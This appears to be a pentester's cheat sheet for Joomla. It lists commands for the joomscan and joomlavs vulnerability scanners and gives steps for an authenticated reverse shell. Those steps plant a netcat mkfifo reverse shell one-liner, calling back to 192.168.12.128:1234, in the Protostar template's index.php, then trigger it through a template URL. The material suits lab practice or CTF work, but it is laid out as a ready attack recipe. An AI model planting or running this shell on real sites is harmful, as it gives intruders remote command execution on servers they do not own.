Joomla

#Joomscan

joomscan --url 192.168.12.130 -ec

#Protostar revshell (Authenticated)

[1]From dashboard locate Templates → Protostar → index.php

edit the top of index.php and add a reverse shell one liner

system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.12.128 1234 >/tmp/f');

[2]Start nc listener port 1234

[3]Trigger revshell: ....../joomla/templates/protostar/html

#joomlaVS

Install dependencies:

sudo apt-get install build-essential patch

sudo apt-get install ruby-dev zlib1g-dev liblzma-dev libcurl4-openssl-dev

sudo git clonehttps://github.com/rastating/joomlavs.git

Usage:

$ joomlavs --url www.target.com -v

# Enumeration
$ joomlavs --url www.target.com -a # All
$ joomlavs --url www.target.com -c # Components
$ joomlavs --url www.target.com -m # Modules
$ joomlavs --url www.target.com -t # Templates
$ joomlavs --url www.target.com -q # Quiet-passive mode